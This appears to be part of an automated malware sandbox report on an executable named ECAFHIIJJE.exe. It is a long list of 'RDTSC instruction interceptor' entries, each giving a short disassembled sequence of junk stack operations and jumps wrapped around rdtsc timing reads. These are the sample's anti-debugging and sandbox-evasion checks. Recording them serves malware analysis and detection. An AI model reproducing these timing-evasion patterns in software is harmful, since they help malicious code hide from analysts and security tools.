Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9337B7 second address: 9337BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9337BD second address: 9337C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9337C2 second address: 9337D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F28C47EE2BFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9337D8 second address: 933817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F28C4758091h 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F28C475807Eh 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 933817 second address: 93381D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 933E06 second address: 933E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 939033 second address: 939039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E849 second address: 93E86F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C4758090h 0x00000008 jmp 00007F28C4758084h 0x0000000d je 00007F28C4758076h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E86F second address: 93E875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E875 second address: 93E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E879 second address: 93E88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F28C47EE2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E9A8 second address: 93E9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E9B2 second address: 93E9B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E9B8 second address: 93E9BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E9BD second address: 93E9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E9CE second address: 93E9D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93E9D4 second address: 93E9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93F109 second address: 93F12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758081h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jo 00007F28C475807Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9410C7 second address: 9410CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9412DC second address: 9412E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9412E0 second address: 9412F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F28C47EE2B6h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9412F2 second address: 9412F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 941BA4 second address: 941BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 941BA9 second address: 941BAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 941BAE second address: 941BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jne 00007F28C47EE2B6h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 941BC3 second address: 941BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 942124 second address: 94212E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 942644 second address: 942660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F28C4758076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jnp 00007F28C4758078h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 942660 second address: 942664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 942664 second address: 9426D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F28C4758078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D27EBh], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F28C4758078h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 xor dword ptr [ebp+122D2283h], ebx 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push esi 0x0000004f jnc 00007F28C4758076h 0x00000055 pop esi 0x00000056 jg 00007F28C475807Ch 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9426D2 second address: 9426D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94304C second address: 943050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 943050 second address: 943071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F28C47EE2B6h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 944036 second address: 94403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94403B second address: 944041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 944BD7 second address: 944BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 944BDC second address: 944BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 946A65 second address: 946A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9474FA second address: 94750B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F28C47EE2BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9475B4 second address: 9475C6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9475C6 second address: 9475CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94A635 second address: 94A63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94A63E second address: 94A642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94A642 second address: 94A646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94CB56 second address: 94CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9437FE second address: 943804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951A0A second address: 951A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951A0E second address: 951A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951A14 second address: 951A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F28C47EE2BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951A27 second address: 951A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951A2B second address: 951A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 952C39 second address: 952C4B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 952C4B second address: 952C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94491E second address: 944927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 944927 second address: 94492B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9579E5 second address: 9579EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 957A76 second address: 957A80 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9598E0 second address: 959950 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007F28C4758076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F28C4758081h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F28C4758078h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 and ebx, dword ptr [ebp+122D3A64h] 0x00000036 mov ebx, eax 0x00000038 push 00000000h 0x0000003a or dword ptr [ebp+122D2F41h], ebx 0x00000040 pushad 0x00000041 push edx 0x00000042 jnc 00007F28C4758076h 0x00000048 pop edi 0x00000049 xor dword ptr [ebp+122D3468h], edi 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 js 00007F28C4758084h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9453F3 second address: 9453F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 945E1E second address: 945E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F28C475807Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9467FB second address: 946801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 946801 second address: 946805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94723A second address: 947244 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F28C47EE2BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94ADFC second address: 94AE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94AE02 second address: 94AE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94CC87 second address: 94CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94CC8B second address: 94CCBB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F28C47EE2BDh 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F28C47EE2C1h 0x0000001c rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 94EC40 second address: 94EC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 950BA8 second address: 950BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951C60 second address: 951D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F28C4758082h 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D20FAh], esi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f add bh, 00000000h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F28C4758078h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov dword ptr [ebp+124568C3h], eax 0x00000049 mov ebx, dword ptr [ebp+122D1C88h] 0x0000004f mov eax, dword ptr [ebp+122D0FFDh] 0x00000055 mov ebx, dword ptr [ebp+122D32CCh] 0x0000005b push FFFFFFFFh 0x0000005d jne 00007F28C4758082h 0x00000063 mov ebx, esi 0x00000065 nop 0x00000066 jo 00007F28C4758084h 0x0000006c pushad 0x0000006d jne 00007F28C4758076h 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951D00 second address: 951D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F28C47EE2C8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951D10 second address: 951D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 951D14 second address: 951D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 952D9D second address: 952DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 8F5FD4 second address: 8F5FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9613CE second address: 9613D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 961528 second address: 961532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 961532 second address: 961538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96166D second address: 961671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 961671 second address: 961684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F28C4758076h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966AA7 second address: 966AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966AAB second address: 966AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966AB1 second address: 966ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966CB1 second address: 966CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966CB5 second address: 966CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966CBB second address: 966CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 966CC1 second address: 966CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 952DA1 second address: 952DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 952DA7 second address: 952DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E5B1 second address: 96E5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F28C4758087h 0x0000000b popad 0x0000000c jnl 00007F28C475807Ch 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96E5DB second address: 96E5E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96D86A second address: 96D870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 96D870 second address: 96D87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F28C47EE2B6h 0x0000000a rdtsc
